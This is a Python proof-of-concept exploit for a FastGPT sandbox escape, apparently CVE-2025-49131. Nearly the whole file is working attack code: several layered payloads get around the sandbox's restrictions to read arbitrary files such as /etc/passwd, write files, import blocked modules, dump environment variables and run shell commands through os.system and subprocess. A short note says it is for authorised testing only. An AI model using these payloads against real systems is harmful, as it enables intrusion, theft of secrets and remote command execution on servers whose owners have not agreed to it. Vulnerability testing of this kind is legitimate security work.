#!/usr/bin/env python3
"""
CVE-2025-49131 - FastGPT Sandbox Escape Proof of Concept
========================================================
Vulnerability: Sandbox Escape via insufficient isolation
Affected: FastGPT fastgpt-sandbox < 4.9.11
CVSS: 6.3 (Medium)
Impact: Read/Write arbitrary files, bypass Python import restrictions

Intended for authorized security testing only: run it solely against
systems you own or have explicit permission to assess.

Author: Security Research
Date: 2025-12-30
"""

import argparse
import base64
import json
import sys
from typing import Any, Dict, Optional

import requests


# Colors for output
class Colors:
    """ANSI escape sequences used to colorize terminal output."""

    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    RESET = '\033[0m'
    BOLD = '\033[1m'


def banner():
    """Print the colored ASCII-art banner and the CVE summary box."""
    # NOTE(review): the spacing inside the artwork is reproduced exactly as
    # it appears in the received source, where runs of whitespace had been
    # collapsed; confirm against the intended artwork if alignment matters.
    print(f"""{Colors.RED}
███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
█████╗ ███████║███████╗ ██║ ██║ ███╗██████╔╝ ██║
██╔══╝ ██╔══██║╚════██║ ██║ ██║ ██║██╔═══╝ ██║
██║ ██║ ██║███████║ ██║ ╚██████╔╝██║ ██║
╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
{Colors.YELLOW}
███████╗ █████╗ ███╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗
██╔════╝██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
███████╗███████║██╔██╗ ██║██║ ██║██████╔╝██║ ██║ ╚███╔╝
╚════██║██╔══██║██║╚██╗██║██║ ██║██╔══██╗██║ ██║ ██╔██╗
███████║██║ ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝
{Colors.GREEN}
███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗
██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝
█████╗ ███████╗██║ ███████║██████╔╝█████╗
██╔══╝ ╚════██║██║ ██╔══██║██╔═══╝ ██╔══╝
███████╗███████║╚██████╗██║ ██║██║ ███████╗
╚══════╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚══════╝
{Colors.CYAN}╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-49131 | CVSS 6.3 (Medium) ║
║ FastGPT Sandbox Container Escape ║
║ Affected: < v4.9.11 ║
║ Impact: File R/W, Import Bypass, Remote Code Execution ║
╚═══════════════════════════════════════════════════════════╝{Colors.RESET}
""")


class FastGPTSandboxExploit:
    """FastGPT Sandbox Escape Exploit Class.

    Wraps a ``requests.Session`` pointed at one target URL and exposes one
    method per test action. Each action sends a list of candidate code
    snippets through :meth:`execute_code` and returns the first response
    that its own success check accepts.
    """

    def __init__(self, target: str, verbose: bool = False):
        """Store the target and prepare the HTTP session.

        Args:
            target: Base URL of the sandbox service; a trailing slash is
                stripped so paths can be appended directly.
            verbose: When true, ``info`` and ``warning`` messages are
                printed in addition to ``success`` and ``error``.
        """
        self.target = target.rstrip('/')
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })

    def log(self, msg: str, level: str = 'info'):
        """Print a colorized, level-tagged message.

        ``success`` and ``error`` messages are always printed; every other
        level is printed only when the instance is verbose. Unknown levels
        fall back to the reset color.
        """
        colors = {
            'info': Colors.BLUE,
            'success': Colors.GREEN,
            'error': Colors.RED,
            'warning': Colors.YELLOW
        }
        if self.verbose or level in ['success', 'error']:
            print(f"{colors.get(level, Colors.RESET)}[{level.upper()}]{Colors.RESET} {msg}")

    def check_target(self) -> bool:
        """Return True when ``GET <target>/health`` answers with HTTP 200.

        Any exception raised by the request is logged as an error and
        reported as ``False``.
        """
        try:
            resp = self.session.get(f"{self.target}/health", timeout=10)
            return resp.status_code == 200
        except Exception as e:
            self.log(f"Target unreachable: {e}", 'error')
            return False

    def detect_vulnerability(self) -> Dict[str, Any]:
        """Run the read-only detection snippets and summarize the outcome.

        Returns:
            A dict with ``vulnerable`` (bool), ``version`` (always the
            string ``"unknown"``; nothing in this method updates it) and
            ``details`` (one entry per snippet that either passed or
            raised).
        """
        self.log("Checking for CVE-2025-49131 vulnerability...", 'info')

        # Detection payload - tries to access __builtins__
        detection_payloads = [
            {
                "code": "str(type(__builtins__))",
                "description": "Builtins access check"
            },
            {
                "code": "str(dir())",
                "description": "Global namespace check"
            }
        ]

        results = {
            "vulnerable": False,
            "version": "unknown",
            "details": []
        }

        for payload in detection_payloads:
            try:
                result = self.execute_code(payload["code"])
                # NOTE(review): a truthy non-string result makes .lower()
                # raise, which lands in the "blocked" branch below.
                if result and "error" not in result.lower():
                    results["details"].append({
                        "test": payload["description"],
                        "result": "passed",
                        "output": result[:100]
                    })
                    results["vulnerable"] = True
            except Exception as e:
                results["details"].append({
                    "test": payload["description"],
                    "result": "blocked",
                    "error": str(e)
                })

        return results

    def execute_code(self, code: str) -> Optional[str]:
        """POST ``code`` to ``<target>/api/sandbox/run`` and return the reply.

        Args:
            code: Source text sent in the ``code`` field of the JSON body;
                ``variables`` is always sent as an empty object.

        Returns:
            On HTTP 200, the ``result`` field of the JSON body, else its
            ``output`` field, else ``str()`` of the whole body. ``None`` on
            any other status code or on any exception (both are logged).
            The value comes straight from the decoded JSON, so it is not
            guaranteed to be a string.
        """
        payload = {
            "code": code,
            "variables": {}
        }

        try:
            resp = self.session.post(
                f"{self.target}/api/sandbox/run",
                json=payload,
                timeout=30
            )

            if resp.status_code == 200:
                data = resp.json()
                return data.get("result", data.get("output", str(data)))
            else:
                self.log(f"Request failed: {resp.status_code}", 'error')
                return None

        except Exception as e:
            self.log(f"Execution error: {e}", 'error')
            return None

    def read_file(self, filepath: str) -> Optional[str]:
        """Try each file-read snippet in turn and return the first result.

        A result is accepted when it is truthy and contains neither
        ``error`` nor ``traceback`` (case-insensitive).

        Args:
            filepath: Path interpolated verbatim into each snippet.

        Returns:
            The accepted result, or ``None`` when every snippet failed.
        """
        self.log(f"Attempting to read: {filepath}", 'info')

        # Multiple file read payloads
        payloads = [
            # Direct open
            f"open('{filepath}', 'r').read()",
            # Builtins bypass
            f"__builtins__.open('{filepath}').read()",
            # Lambda wrapper
            f"(lambda: open('{filepath}').read())()",
            # Getattr bypass
            f"getattr(__builtins__, 'open')('{filepath}').read()",
            # exec()-based assignment
            f"exec('result=open(\"{filepath}\").read()') or result",
        ]

        for i, payload in enumerate(payloads, 1):
            self.log(f"Trying payload {i}/{len(payloads)}...", 'info')
            try:
                result = self.execute_code(payload)
                if result and "error" not in result.lower() and "traceback" not in result.lower():
                    self.log(f"Success with payload {i}!", 'success')
                    return result
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue

        self.log("All file read payloads failed", 'error')
        return None

    def write_file(self, filepath: str, content: str) -> bool:
        """Try each file-write snippet in turn.

        Args:
            filepath: Path interpolated verbatim into each snippet.
            content: Text to write; backslashes and single quotes are
                escaped so it fits inside a single-quoted literal.

        Returns:
            ``True`` as soon as one snippet yields a truthy result,
            otherwise ``False``.
        """
        self.log(f"Attempting to write to: {filepath}", 'info')

        # Escape content for Python string
        escaped_content = content.replace('\\', '\\\\').replace("'", "\\'")

        payloads = [
            f"open('{filepath}', 'w').write('{escaped_content}')",
            f"__builtins__.open('{filepath}', 'w').write('{escaped_content}')",
        ]

        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result:
                    self.log("File write successful!", 'success')
                    return True
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue

        self.log("All file write payloads failed", 'error')
        return False

    def import_bypass(self, module: str) -> Optional[str]:
        """Try each import snippet in turn and return the first result.

        A result is accepted when it is truthy and does not contain
        ``error`` (case-insensitive).

        Args:
            module: Module name interpolated verbatim into each snippet.

        Returns:
            The accepted result, or ``None`` when every snippet failed.
        """
        self.log(f"Attempting to import: {module}", 'info')

        payloads = [
            # Direct import
            f"__import__('{module}')",
            # Builtins import
            f"__builtins__.__import__('{module}')",
            # Importlib
            f"__import__('importlib').import_module('{module}')",
            # Exec import
            f"exec('import {module}')",
            # Dict access
            f"__builtins__.__dict__['__import__']('{module}')",
        ]

        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result and "error" not in result.lower():
                    self.log(f"Import bypass successful with payload {i}!", 'success')
                    return result
            except Exception:
                # Best effort: move on to the next snippet.
                continue

        self.log("All import bypass payloads failed", 'error')
        return None

    def get_env(self) -> Optional[Any]:
        """Return the first truthy result of the environment snippets.

        The value is whatever :meth:`execute_code` returned for the first
        snippet that produced a truthy result; ``None`` when none did.
        """
        self.log("Attempting to read environment variables...", 'info')

        payloads = [
            "__import__('os').environ.copy()",
            "dict(__import__('os').environ)",
        ]

        for payload in payloads:
            try:
                result = self.execute_code(payload)
                if result:
                    return result
            except Exception:
                # Narrowed from a bare ``except:`` so that Ctrl-C
                # (KeyboardInterrupt) and SystemExit are not swallowed.
                continue

        return None

    def rce_chain(self, command: str) -> Optional[str]:
        """Try each command-execution snippet in turn.

        Args:
            command: Command text interpolated verbatim into each snippet.

        Returns:
            The first truthy result, or ``None`` when every snippet failed.
        """
        self.log(f"Attempting RCE chain with command: {command}", 'info')

        payloads = [
            # os.system
            f"__import__('os').system('{command}')",
            # os.popen
            f"__import__('os').popen('{command}').read()",
            # subprocess
            f"__import__('subprocess').check_output('{command}', shell=True).decode()",
            # subprocess with Popen
            f"__import__('subprocess').Popen('{command}', shell=True, stdout=-1).communicate()[0].decode()",
        ]

        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result:
                    self.log(f"RCE successful with method {i}!", 'success')
                    return result
            except Exception as e:
                self.log(f"RCE method {i} failed: {e}", 'warning')
                continue

        self.log("All RCE payloads failed", 'error')
        return None


def main():
    """Parse the command line, run the requested actions, report results.

    Actions run in a fixed order (detect, read, write, import, env, rce);
    each one appends an entry to the ``results`` dict, which is written as
    JSON to ``--output`` when that option is given.
    """
    banner()

    parser = argparse.ArgumentParser(
        description='CVE-2025-49131 - FastGPT Sandbox Escape POC',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python poc.py --target http://localhost:3001 --detect
  python poc.py --target http://localhost:3001 --read /etc/passwd
  python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
  python poc.py --target http://localhost:3001 --import os
  python poc.py --target http://localhost:3001 --rce "id"
        """
    )

    parser.add_argument('--target', '-t', required=True, help='Target FastGPT sandbox URL')
    parser.add_argument('--detect', '-d', action='store_true', help='Detect vulnerability (non-destructive)')
    parser.add_argument('--read', '-r', help='File path to read')
    parser.add_argument('--write', '-w', help='File path to write')
    parser.add_argument('--content', '-c', default='CVE-2025-49131 POC', help='Content to write')
    parser.add_argument('--import', '-i', dest='import_module', help='Module to import')
    parser.add_argument('--env', '-e', action='store_true', help='Read environment variables')
    parser.add_argument('--rce', help='Command to execute (RCE)')
    parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
    parser.add_argument('--output', '-o', help='Output file for results')

    args = parser.parse_args()

    exploit = FastGPTSandboxExploit(args.target, args.verbose)
    results = {"target": args.target, "cve": "CVE-2025-49131", "actions": []}

    if args.detect:
        print(f"\n{Colors.CYAN}[*] Running vulnerability detection...{Colors.RESET}")
        detect_result = exploit.detect_vulnerability()
        results["detection"] = detect_result

        if detect_result["vulnerable"]:
            print(f"{Colors.GREEN}[+] TARGET IS VULNERABLE!{Colors.RESET}")
        else:
            print(f"{Colors.YELLOW}[-] Target may be patched or not vulnerable{Colors.RESET}")

        print(json.dumps(detect_result, indent=2))

    if args.read:
        print(f"\n{Colors.CYAN}[*] Reading file: {args.read}{Colors.RESET}")
        content = exploit.read_file(args.read)
        if content:
            print(f"{Colors.GREEN}[+] File content:{Colors.RESET}")
            print("-" * 50)
            print(content)
            print("-" * 50)
            # Only the first 500 characters are kept in the saved report.
            results["actions"].append({"type": "read", "file": args.read, "success": True, "content": content[:500]})
        else:
            results["actions"].append({"type": "read", "file": args.read, "success": False})

    if args.write:
        print(f"\n{Colors.CYAN}[*] Writing to file: {args.write}{Colors.RESET}")
        success = exploit.write_file(args.write, args.content)
        results["actions"].append({"type": "write", "file": args.write, "success": success})
        if success:
            print(f"{Colors.GREEN}[+] File written successfully!{Colors.RESET}")

    if args.import_module:
        print(f"\n{Colors.CYAN}[*] Attempting import bypass: {args.import_module}{Colors.RESET}")
        result = exploit.import_bypass(args.import_module)
        results["actions"].append({"type": "import", "module": args.import_module, "success": bool(result)})
        if result:
            print(f"{Colors.GREEN}[+] Import bypass successful: {result}{Colors.RESET}")

    if args.env:
        print(f"\n{Colors.CYAN}[*] Reading environment variables...{Colors.RESET}")
        env = exploit.get_env()
        if env:
            print(f"{Colors.GREEN}[+] Environment:{Colors.RESET}")
            print(env)
            results["actions"].append({"type": "env", "success": True})
        else:
            # Record the failure too, so the report matches the other actions.
            results["actions"].append({"type": "env", "success": False})

    if args.rce:
        print(f"\n{Colors.CYAN}[*] Attempting RCE: {args.rce}{Colors.RESET}")
        output = exploit.rce_chain(args.rce)
        if output:
            print(f"{Colors.GREEN}[+] Command output:{Colors.RESET}")
            print("-" * 50)
            print(output)
            print("-" * 50)
            results["actions"].append({"type": "rce", "command": args.rce, "success": True, "output": output})
        else:
            results["actions"].append({"type": "rce", "command": args.rce, "success": False})

    if args.output:
        with open(args.output, 'w', encoding='utf-8') as f:
            json.dump(results, f, indent=2)
        print(f"\n{Colors.GREEN}[+] Results saved to: {args.output}{Colors.RESET}")

    print(f"\n{Colors.PURPLE}[*] Exploit completed.{Colors.RESET}")


if __name__ == "__main__":
    main()